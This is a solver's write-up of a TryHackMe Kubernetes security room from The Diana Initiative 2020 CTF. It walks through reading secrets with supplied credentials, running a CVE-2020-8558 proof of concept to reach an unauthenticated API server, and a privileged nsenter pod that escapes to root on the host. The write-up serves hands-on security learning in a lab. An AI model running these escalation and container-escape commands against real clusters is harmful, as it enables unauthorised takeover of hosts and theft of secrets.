TryHackMe: kubernetes chall tdi 2020 by tabby

Kubernetes and Container Security: Hands-On Introduction

Welcome to Kubernetes and Container Security: Hands-On Introduction, as presented at The Diana Initiative 2020! This material was developed for challenge #19 in the CTF, and the walkthrough was presented live on Saturday, 20202/08/22 at 1:00PM PDT.

The goal of this workshop is to help introduce you to the basic concepts of hacking Kubernetes. The intended audience is folx with offensive security or pentesting experience who want to learn about Kubernetes, or Kubernetes engineers who are beginning to think about the potential abuse of their clusters.

If you're new to Kubernetes, I highly recommend you begin by watching the beginning of the walkthrough (up to about minute 23) to become familiar with the terms and concepts. Then, try to solve the challenge on your own; it has a lot of built-in hinting to help you progress. Of course, if you get stuck, you can always go back to the video for explicit instruction.

To begin, you'll want to boot the VM, install kubectl, and download the challenge kubeconfig file from Task #2 so you can connect to Kubernetes.

Pull up a chair, warm up your terminal, and get ready to hack my cluster! I'm so glad you're here.

-Tabitha

About the author: Tabitha Sable has been a hacker and cross-platform sysadmin since the turn of the century. At work, she builds tools and makes friends: writing proof of concept exploits, coordinating the efforts of the infrastructure, security, and product teams, and generally saying "I wonder what happens if we..." quite often. Outside of work, she can often be found bicycling, driving, or competing in Capture the Flag contests. You can follow her on Twitter at @tabbysable.

Use the provided credentials to access the Kubernetes cluster and find the first flag somewhere inside.

alias k="KUBECONFIG=diana.kubeconfig kubectl --server https://10.10.110.14:6443 --insecure-skip-tls-verify

╰─○ k version     
Client Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.5", GitCommit:"6b1d87acf3c8253c123756b9e61dac642678305f", GitTreeState:"clean", BuildDate:"2021-03-31T15:33:39Z", GoVersion:"go1.15.10", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"18", GitVersion:"v1.18.3", GitCommit:"2e7996e3e2712684bc73f0dec0200d64eec7fe40", GitTreeState:"clean", BuildDate:"2020-05-20T12:43:34Z", GoVersion:"go1.13.9", Compiler:"gc", Platform:"linux/amd64"}

k get secrets flag1 -o yaml

apiVersion: v1
data:
flag: [REDACTED]
message: [REDACTED]

Become cluster admin and find the second flag inside.

k run t00lbox --image tdi-ctf-toolbox:1.0.0 -it --rm bash --image-pull-policy=IfNotPresent

git clone https://github.com/tabbysable/POC-2020-8558.git

copy/paste to /tmp/poc.py
chmod +x /tmp/poc.py
./tmp/poc.py 203.0.113.1 &
check with nc 203.0.113.1 8080
get /

kubectl --server http://198.51.100.1:8080 get secrets -n kube-system flag2 -o yaml

apiVersion: v1
data:
flag: [REDACTED]
message: [REDACTED]

Get the bonus flag from kubernetes.

kubectl --server http://198.51.100.1:8080 get flag -A -o yaml

apiVersion: v1
items:
- apiVersion: dianainitiative.org/v1
kind: Flag
metadata:
    annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
        {"apiVersion":"dianainitiative.org/v1","kind":"Flag","metadata":{"annotations":{},"name":"bonus-1","namespace":"kube-public"},"spec":{"flag":"TDI{exploring_the_kubernets}"}}
    creationTimestamp: "2020-08-16T03:51:50Z"
    generation: 1
    managedFields:
    - apiVersion: dianainitiative.org/v1
    fieldsType: FieldsV1
    fieldsV1:
        f:metadata:
        f:annotations:
            .: {}
            f:kubectl.kubernetes.io/last-applied-configuration: {}
        f:spec:
        .: {}
        f:flag: {}
    manager: kubectl
    operation: Update
    time: "2020-08-16T03:51:50Z"
    name: bonus-1
    namespace: kube-public
    resourceVersion: "29338"
    selfLink: /apis/dianainitiative.org/v1/namespaces/kube-public/flags/bonus-1
    uid: 9e9cdeef-8dd5-45f6-a441-3d4eebbf24c5
spec:
    flag: [REDACTED]

Escape to root on the host and find the third flag.

https://securekubernetes.com/scenario_2_attack/

kubectl --server http://198.51.100.1:8080 run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'

root@r00t:~# cat /root/flag3.txt

[REDACTED]

Find the bonus flag on the host.

root@r00t:~# history

    1  echo "[REDACTED]"

Done

Was an interesting room, not used kubernetes before so learnt something new.